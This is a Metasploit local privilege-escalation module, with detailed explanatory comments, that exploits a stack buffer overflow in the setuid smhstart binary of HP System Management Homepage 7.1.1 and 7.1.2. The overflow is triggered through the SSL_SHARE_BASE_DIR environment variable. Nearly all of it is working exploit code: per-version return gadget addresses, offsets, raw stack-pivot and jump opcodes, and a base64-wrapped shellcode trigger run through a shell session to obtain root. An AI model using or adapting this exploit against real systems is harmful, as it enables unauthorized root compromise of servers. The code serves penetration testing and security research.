##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
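class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Exploit::EXE
  include Msf::Post::File

  include Msf::Exploit::Local::Linux

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'HP System Management Homepage Local Privilege Escalation',
          'Description' => %q{
            Versions of HP System Management Homepage <= 7.1.2 include a setuid root
            smhstart which is vulnerable to a local buffer overflow in SSL_SHARE_BASE_DIR
            env variable.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'agix' # @agixid # Vulnerability discovery and Metasploit module
          ],
          'Platform' => [ 'linux' ],
          'Arch' => [ ARCH_X86 ],
          # The trigger is an oversized environment variable handed to a setuid
          # binary via the session's shell; only shell sessions are supported.
          'SessionTypes' => [ 'shell' ],
          'Payload' => {
            # The return-address placement in build_trigger assumes the encoded
            # payload occupies exactly this many bytes (see the jmp displacement).
            'Space' => 227,
            # 0x00 can never be carried in an environment variable value (C string).
            # 0x22 is excluded by the original author; the reason is not recorded here.
            'BadChars' => "\x00\x22"
          },
          'References' => [
            ['OSVDB', '91990']
          ],
          'Targets' => [
            [
              'HP System Management Homepage 7.1.1',
              {
                'Arch' => ARCH_X86,
                # Address of a `call esp` gadget inside this version's smhstart image
                # (0x080xxxxx range suggests a non-PIE binary — addresses are per-version).
                'CallEsp' => 0x080c86eb, # call esp
                'Offset' => 58
              }
            ],
            [
              'HP System Management Homepage 7.1.2',
              {
                'Arch' => ARCH_X86,
                'CallEsp' => 0x080c8b9b, # call esp
                'Offset' => 58
              }
            ],
          ],
          'DefaultOptions' => {
            # smhstart is setuid root; the payload first calls setuid(0) so the
            # real uid is promoted too, not just the effective uid.
            'PrependSetuid' => true
          },
          'DefaultTarget' => 0,
          'DisclosureDate' => '2013-03-30',
          'Notes' => {
            'Reliability' => UNKNOWN_RELIABILITY,
            'Stability' => UNKNOWN_STABILITY,
            'SideEffects' => UNKNOWN_SIDE_EFFECTS
          },
        }
      )
    )
    register_options([
      # Directory containing the setuid smhstart binary. Operator-supplied; it is
      # interpolated into a shell command unquoted, so it must not contain spaces
      # or shell metacharacters.
      OptString.new("smhstartDir", [ true, "smhstart directory", "/opt/hp/hpsmh/sbin/" ])
    ])
  end

  # Runs the exploit: verifies the session runs as the hpsmh user, builds the
  # overflow string, then launches smhstart with SSL_SHARE_BASE_DIR set to it.
  #
  # Raises via fail_with(Failure::NoAccess) when the session user is not hpsmh.
  def exploit
    # Check the user before doing any payload work so a wrong-user session fails fast.
    current_user = cmd_exec("id -un")
    if current_user != "hpsmh"
      fail_with(Failure::NoAccess, "You are #{current_user}, you must be hpsmh to exploit this")
    end

    trigger = build_trigger(payload.encoded)

    # base64 keeps raw shellcode bytes off the command line; only [A-Za-z0-9+/=]
    # reach the shell, so nothing inside the single quotes needs escaping.
    # (Any 0x00 in the decoded value would be dropped by the shell's $(...) —
    # hence it is a bad char above.)
    trigger_b64 = Rex::Text.encode_base64(trigger)

    # File.join avoids the "dir//smhstart" double slash the default value produced.
    smhstart = File.join(datastore['smhstartDir'], 'smhstart')

    # Set the variable and run the binary in a single command: this does not rely
    # on an `export` surviving between two cmd_exec calls, and it does not leave
    # the oversized value exported in the operator's session shell afterwards.
    cmd_exec("SSL_SHARE_BASE_DIR=$(echo -n '#{trigger_b64}' | base64 -d) #{smhstart}")
  end

  private

  # Builds the value written into SSL_SHARE_BASE_DIR:
  #
  #   [ payload (Space bytes) ][ call esp ][ add esp,-0xef ][ jmp -0xf2 ][ Offset filler ]
  #
  # `call esp` overwrites the saved return address and transfers control to the
  # bytes that follow it on the stack; `add esp, 0xffffff11` (-0xef) moves esp
  # back below the payload (presumably so the shellcode's own pushes do not land
  # on top of it — confirm); `jmp 0xffffff0e` (-0xf2 = -242) jumps 242 bytes
  # back, which is exactly Space(227) + 4 + 6 + 5, i.e. the first byte of the
  # payload when the encoded payload fills Space.
  #
  # pl: the encoded payload. It is copied rather than appended to in place so
  # the framework's cached encoded payload is not mutated if exploit runs twice.
  # Returns the complete trigger string.
  def build_trigger(pl)
    ret = [target['CallEsp']].pack('V')

    buf = pl.dup
    buf << ret
    buf << "\x81\xc4\x11\xff\xff\xff" # add esp, 0xffffff11 (esp -= 0xef)
    buf << "\xe9\x0e\xff\xff\xff"     # jmp -0xf2 => beginning of pl
    buf << rand_text_alpha(target['Offset'])
    buf
  end
end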